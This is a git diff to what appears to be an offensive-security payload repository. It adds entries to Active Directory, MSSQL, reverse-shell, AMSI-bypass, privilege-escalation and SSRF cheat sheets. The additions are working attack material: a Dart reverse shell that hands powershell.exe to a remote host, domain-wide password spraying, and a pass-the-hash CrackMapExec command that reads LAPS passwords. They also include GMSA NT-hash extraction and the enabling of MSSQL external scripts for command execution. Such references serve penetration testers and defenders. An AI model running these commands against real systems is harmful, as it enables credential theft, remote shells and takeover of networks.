diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 30fcd4e..a3e58f8 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -37,6 +37,7 @@ - [Spray passwords against the RDP service](#spray-passwords-against-the-rdp-service) - [Password in AD User comment](#password-in-ad-user-comment) - [Reading LAPS Password](#reading-laps-password) + - [Reading GMSA Password](#reading-gmsa-password) - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) - [Using Mimikatz](#using-mimikatz) - [Using Meterpreter](#using-meterpreter) @@ -195,12 +196,12 @@ use [BloodHound](https://github.com/BloodHoundAD/BloodHound) # run the collector on the machine using SharpHound.exe # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe -.\SharpHound.exe (from resources/Ingestor) -.\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 -.\SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 .\SharpHound.exe -c all -d active.htb -SearchForest .\SharpHound.exe --EncryptZip --ZipFilename export.zip -.\SharpHound.exe --CollectionMethod All --LDAPUser --LDAPPass --JSONFolder +.\SharpHound.exe -c all,GPOLocalGroup +.\SharpHound.exe -c all --LDAPUser --LDAPPass --JSONFolder +.\SharpHound.exe -c all -d active.htb --LDAPUser --LDAPPass --domaincontroller 10.10.10.100 + # or run the collector on the machine using Powershell # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 @@ -221,6 +222,9 @@ root@payload$ apt install bloodhound # start BloodHound and the database root@payload$ neo4j console +# or use docker +root@payload$ docker run -p7474:7474 -p7687:7687 -e NEO4J_AUTH=neo4j/bloodhound neo4j + root@payload$ ./bloodhound --no-sandbox Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j ``` @@ -988,6 +992,17 @@ Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` ``` +Using `DomainPasswordSpray` to spray a password against all users of a domain. + +```powershell +# https://github.com/dafthack/DomainPasswordSpray +Invoke-DomainPasswordSpray -Password Summer2021! + +# /!\ be careful with the account lockout ! +Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt + +``` + #### Spray passwords against the RDP service Using RDPassSpray to target RDP services. @@ -1019,6 +1034,35 @@ or dump the Active Directory and `grep` the content. ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ ``` +### Reading GMSA Password + +> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed. + +#### GMSA Attributes in the Active Directory +* **msDS-GroupMSAMembership** (PrincipalsAllowedToRetrieveManagedPassword) - stores the security principals that can access the GMSA password. +* **msds-ManagedPassword** - This attribute contains a BLOB with password information for group-managed service accounts. +* **msDS-ManagedPasswordId** - This constructed attribute contains the key identifier for the current managed password data for a group MSA. +* **msDS-ManagedPasswordInterval** - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA. + + +#### Extract NT hash from the Active Directory + +* GMSAPasswordReader (C#) + ```ps1 + # https://github.com/rvazarkar/GMSAPasswordReader + GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT + ``` + +* Active Directory Powershell + ```ps1 + $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword' + $blob = $gmsa.'msDS-ManagedPassword' + $mp = ConvertFrom-ADManagedPasswordBlob $blob + $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword + ``` + +* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module + ### Reading LAPS Password @@ -1036,6 +1080,11 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' > The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users +* CrackMapExec + ```powershell + crackmapexec smb 10.10.10.10 -u user -H 8846f7eaee8fb117ad06bdd830b7586c -M laps + ``` + * Powerview ```powershell PS > Import-Module .\PowerView.ps1 diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index 8b766f2..2b6fa34 100644 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md @@ -36,7 +36,7 @@ * [Python](#python) * [R](#r) * [Audit Checks](#audit-checks) - * [Find and exploit impersonation opportunities](#find-and-explit-impersonation-opportunities) + * [Find and exploit impersonation opportunities](#find-and-exploit-impersonation-opportunities) * [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy) * [Manual SQL Server Queries](#manual-sql-server-queries) * [Query Current User & determine if the user is a sysadmin](#query-current-user--determine-if-the-user-is-a-sysadmin) @@ -268,6 +268,13 @@ Get-SQLAgentJob -Instance "" -username sa -Password Pas ## External Scripts +:warning: You need to enable **external scripts**. + +```sql +sp_configure 'external scripts enabled', 1; +RECONFIGURE; +``` + ## Python: ```ps1 @@ -285,6 +292,14 @@ Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance " select is_member('db_owner'); + SQL> execute as user = 'dbo' + SQL> SELECT is_srvrolemember('sysadmin') + ``` + ```ps1 Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "" -Exploit -Verbose diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index d960038..4ee06f6 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -7,6 +7,7 @@ * [Bash TCP](#bash-tcp) * [Bash UDP](#bash-udp) * [C](#c) + * [Dart](#dart) * [Golang](#golang) * [Groovy Alternative 1](#groovy-alternative-1) * [Groovy](#groovy) @@ -346,6 +347,29 @@ int main(void){ } ``` +### Dart + +```java +import 'dart:io'; +import 'dart:convert'; + +main() { + Socket.connect("10.0.0.1", 4242).then((socket) { + socket.listen((data) { + Process.start('powershell.exe', []).then((Process process) { + process.stdin.writeln(new String.fromCharCodes(data).trim()); + process.stdout + .transform(utf8.decoder) + .listen((output) { socket.write(output); }); + }); + }, + onDone: () { + socket.destroy(); + }); + }); +} +``` + ## Meterpreter Shell ### Windows Staged reverse TCP diff --git a/Methodology and Resources/Windows - AMSI Bypass.md b/Methodology and Resources/Windows - AMSI Bypass.md index a7464a7..ff80a25 100644 --- a/Methodology and Resources/Windows - AMSI Bypass.md +++ b/Methodology and Resources/Windows - AMSI Bypass.md @@ -2,6 +2,7 @@ ## Summary +* [Which Endpoint Protection is Using AMSI](#which-endpoint-protection-is-using-amsi) * [Patching amsi.dll AmsiScanBuffer by rasta-mouse](#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse) * [Dont use net webclient](#Dont-use-net-webclient) * [Amsi ScanBuffer Patch from -> https://www.contextis.com/de/blog/amsi-bypass](#Amsi-ScanBuffer-Patch) @@ -17,6 +18,10 @@ * [Nishang all in one](#Nishang-all-in-one) * [Adam Chesters Patch](#Adam-Chester-Patch) +## Which Endpoint Protection is Using AMSI + +* https://github.com/subat0mik/whoamsi/wiki/Which-Endpoint-Protection-is-Using-AMSI%3F + # Patching amsi.dll AmsiScanBuffer by rasta-mouse diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index eea8995..9d3ee8b 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -242,6 +242,7 @@ List all network shares ```powershell net share +powershell Find-DomainShare -ComputerDomain domain.local ``` SNMP Configuration @@ -272,8 +273,7 @@ PS C:\> Set-MpPreference -DisableIOAVProtection $true List AppLocker rules ```powershell -PS C:\> $a = Get-ApplockerPolicy -effective -PS C:\> $a.rulecollections +PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections ``` ### Powershell diff --git a/Server Side Request Forgery/Images/SSRF_PDF.png b/Server Side Request Forgery/Images/SSRF_PDF.png new file mode 100644 index 0000000..80a97ba Binary files /dev/null and b/Server Side Request Forgery/Images/SSRF_PDF.png differ diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index f25775b..c3a2016 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -223,7 +223,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/ http://127.1.1.1:80#\@127.2.2.2:80/ ``` -![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) +![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) ### Bypassing using a redirect [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) @@ -433,6 +433,8 @@ gopher://127.0.0.1:6379/_save ## SSRF exploiting PDF file +![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.jpg?raw=true) + Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c&feature=emb_title) ```powershell